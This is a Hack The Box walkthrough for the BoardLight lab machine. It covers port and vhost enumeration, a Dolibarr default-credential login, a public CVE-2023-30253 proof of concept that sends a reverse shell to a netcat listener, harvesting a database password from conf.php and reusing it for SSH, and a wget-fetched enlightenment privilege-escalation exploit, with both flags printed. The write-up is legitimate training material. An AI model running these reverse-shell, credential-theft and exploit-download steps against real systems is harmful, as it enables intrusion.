BoardLight - HackMD

<style> </style> <div style="text-align:center;"> <img src='https://hackmd.io/_uploads/Bysymv1KR.jpg' /> <br /> <br /> </div> <div> > HTB machine link: <a href="https://app.hackthebox.com/machines/BoardLight ">https://app.hackthebox.com/machines/BoardLight</a> </div> <div style="padding-top: 20px"> ``` Nmap scan result: > nmap 10.10.11.11 -v -A Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-25 02:05 EDT NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 02:05 Completed NSE at 02:05, 0.00s elapsed Initiating NSE at 02:05 Completed NSE at 02:05, 0.00s elapsed Initiating NSE at 02:05 Completed NSE at 02:05, 0.00s elapsed Initiating Ping Scan at 02:05 Scanning 10.10.11.11 [2 ports] Completed Ping Scan at 02:05, 0.31s elapsed (1 total hosts) Initiating Connect Scan at 02:05 Scanning board.htb (10.10.11.11) [1000 ports] Discovered open port 80/tcp on 10.10.11.11 Discovered open port 22/tcp on 10.10.11.11 Increasing send delay for 10.10.11.11 from 0 to 5 due to max_successful_tryno increase to 4 Completed Connect Scan at 02:06, 30.54s elapsed (1000 total ports) Initiating Service scan at 02:06 Scanning 2 services on board.htb (10.10.11.11) Completed Service scan at 02:06, 6.66s elapsed (2 services on 1 host) NSE: Script scanning 10.10.11.11. Initiating NSE at 02:06 Completed NSE at 02:06, 11.89s elapsed Initiating NSE at 02:06 Completed NSE at 02:06, 1.27s elapsed Initiating NSE at 02:06 Completed NSE at 02:06, 0.00s elapsed Nmap scan report for board.htb (10.10.11.11) Host is up (0.31s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 02:06 Completed NSE at 02:06, 0.00s elapsed Initiating NSE at 02:06 Completed NSE at 02:06, 0.00s elapsed Initiating NSE at 02:06 Completed NSE at 02:06, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 50.93 seconds ``` </div> <div> I figured out that the server is opening two ports. If these two ports cannot be exploited, I will scan for more ports. The 80 port is running http (board.htb) </div> <div> <br /> Modify the /etc/hosts: <br /> > sudo vi /etc/hosts <br /> 10.10.11.11 board.htb </div> <div style="padding-top:50px"> I did scanned for subdirectory but didn't find anything special. > gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -u http://board.htb Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) Url: http://board.htb [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s Starting gobuster in directory enumeration mode /images (Status: 301) [Size: 307] [--> http://board.htb/images/] /css (Status: 301) [Size: 304] [--> http://board.htb/css/] /js (Status: 301) [Size: 303] [--> http://board.htb/js/] <br /> > dirsearch -u http://board.htb -x 403 Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali/reports/http_board.htb/_24-07-25_02-52-04.txt Target: http://board.htb/ [02:52:04] Starting: [02:52:08] 301 - 303B - /js -> http://board.htb/js/ [02:52:35] 200 - 2KB - /about.php [02:53:16] 404 - 16B - /composer.phar [02:53:18] 200 - 2KB - /contact.php [02:53:20] 301 - 304B - /css -> http://board.htb/css/ [02:53:39] 301 - 307B - /images -> http://board.htb/images/ [02:54:04] 404 - 16B - /php-cs-fixer.phar [02:54:08] 404 - 16B - /phpunit.phar <br /> Brute force for vhost > ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://board.htb -H 'host: FUZZ.board.htb' -fs 15949 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://board.htb :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt :: Header : Host: FUZZ.board.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 15949 ________________________________________________ crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 352ms] :: Progress: [4989/4989] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:43] :: Errors: 0 Finally I found a vhost that I can use to exploit this website. </div> At http://crm.board.htb, I found this login form: ![dolibarr](https://hackmd.io/_uploads/B1MqGYkKA.png) Do a quick research, I found the default credential that work. https://www.dolibarr.org/forum/t/login-after-installation/16088/2 Result: admin / admin <br /> ________________________________________________ <div> Find the CVE that work with Dolibarr 17.0.0, I found this CVE-2023-30253. <br /> Poc link: <a href='https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/tree/main'>https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/tree/main </a> </div> <div> Get shell: <pre> Step 1: Listen on the port to get the reverse shell: nc -nvlp 9999 Step 2: Run the POC: python3 exploit.py http://crm.board.htb admin admin 10.10.14.156 9999 </pre> ![dolibarr_shell](https://hackmd.io/_uploads/ry_taKyt0.png) </div> <div> <h3> Privilege escalation </h3> The current user is www-data <br /> Move back to the /var/www/html folder <br /> From current position, run this command to find the config.php, I guessed that because of the structure of the folder, may be it will have some useful php file. > find . -iname 'conf.php' 2>/dev/null result: crm.board.htb/htdocs/conf/conf.php Run cat command to read this file, we have this > <?php > // > // File generated by Dolibarr installer 17.0.0 on May 13, 2024 > // > // Take a look at conf.php.example file for an example of conf.php file > // and explanations for all possibles parameters. > // > $dolibarr_main_url_root='http://crm.board.htb'; > $dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs'; > $dolibarr_main_url_root_alt='/custom'; > $dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom'; > $dolibarr_main_data_root='/var/www/html/crm.board.htb/documents'; > $dolibarr_main_db_host='localhost'; > $dolibarr_main_db_port='3306'; > $dolibarr_main_db_name='dolibarr'; > $dolibarr_main_db_prefix='llx_'; > $dolibarr_main_db_user='dolibarrowner'; > $dolibarr_main_db_pass='serverfun2$2023!!'; > $dolibarr_main_db_type='mysqli'; > $dolibarr_main_db_character_set='utf8'; > $dolibarr_main_db_collation='utf8_unicode_ci'; > // Authentication settings > $dolibarr_main_authentication='dolibarr'; > > //$dolibarr_main_demo='autologin,autopass'; > // Security settings > $dolibarr_main_prod='0'; > $dolibarr_main_force_https='0'; > $dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore'; > $dolibarr_nocsrfcheck='0'; > $dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5'; > $dolibarr_mailing_limit_sendbyweb='0'; > $dolibarr_mailing_limit_sendbycli='0'; > > //$dolibarr_lib_FPDF_PATH=''; > //$dolibarr_lib_TCPDF_PATH=''; > //$dolibarr_lib_FPDI_PATH=''; > //$dolibarr_lib_TCPDI_PATH=''; > //$dolibarr_lib_GEOIP_PATH=''; > //$dolibarr_lib_NUSOAP_PATH=''; > //$dolibarr_lib_ODTPHP_PATH=''; > //$dolibarr_lib_ODTPHP_PATHTOPCLZIP=''; > //$dolibarr_js_CKEDITOR=''; > //$dolibarr_js_JQUERY=''; > //$dolibarr_js_JQUERY_UI=''; > > //$dolibarr_font_DOL_DEFAULT_TTF=''; > //$dolibarr_font_DOL_DEFAULT_TTF_BOLD=''; > $dolibarr_main_distrib='standard'; > > </div> > > </div> > > <div> > $dolibarr_main_db_host='localhost'; > $dolibarr_main_db_port='3306'; > $dolibarr_main_db_name='dolibarr'; > $dolibarr_main_db_prefix='llx_'; > $dolibarr_main_db_user='dolibarrowner'; > $dolibarr_main_db_pass='serverfun2$2023!!'; > $dolibarr_main_db_type='mysqli'; > <br /> > These information will be useful. > </div> > <div> <br /> I tried to use the password 'serverfun2$2023!!' to the user that I found in the /home folder. <br /> It succeeded. </div> <div style="text-align:center"> ![larissa_shell](https://hackmd.io/_uploads/BJIcZ9JKR.png) </div> <div> <h2> User flag </h2> <div style="text-align:center"> ![user_flag](https://hackmd.io/_uploads/ryPgf9kYR.png) > 6050413292388fa1905ef39a049b47ad </div> </div> <div> Tried to run sudo -l but the current user can't run sudo in localhost. <br /> So I tried this command find / -perm -u=s -type f 2>/dev/null </div> ![per](https://hackmd.io/_uploads/rJbD35JF0.png) <div> I though that enlightenment is some additional service, so I take a look at it and do some research. I googled 'enlightenment exploit' and it was the first result: <br /> <a href="https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit"> https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit </a> So before using linpeas, you should take a look on something like: > sudo -l > find / -perm -u=s -type f 2>/dev/null > uname -a > lsb_release -a > cat /etc/version && cat /etc/*release > ls -lah in the home folder of current user, after that check all the strange things. For more information you can take a look at the repo I mentioned, maybe I will write a blog to give more detail about it later. </div> <div style="text-align:center;"> ![per_pro](https://hackmd.io/_uploads/rkmQC91FR.png) </div> <div> You have some options, use python3 -m http.server 8888 to start a web server in current dir, or use apache2, the default path is /var/www/html. In this case, I use the second way. </div> <br /> <div> On the BroadLight machine, in larissa's home folder, run this to download the poc. <br /> > wget 10.10.14.156/CVE-2022-37706-LPE-exploit/exploit.sh After that, you set the file is executable by using 'chmod +x exploit.sh' and run it to see the result. </div> <div style="text-align:center;"> ![rootgot](https://hackmd.io/_uploads/H1HtJiyK0.png) </div> <div style="text-align:center;"> Now go get the root flag. ![rootflag](https://hackmd.io/_uploads/rkj1eskFC.png) > bdb34745757d163fd9e3d4ff39a5073a </div>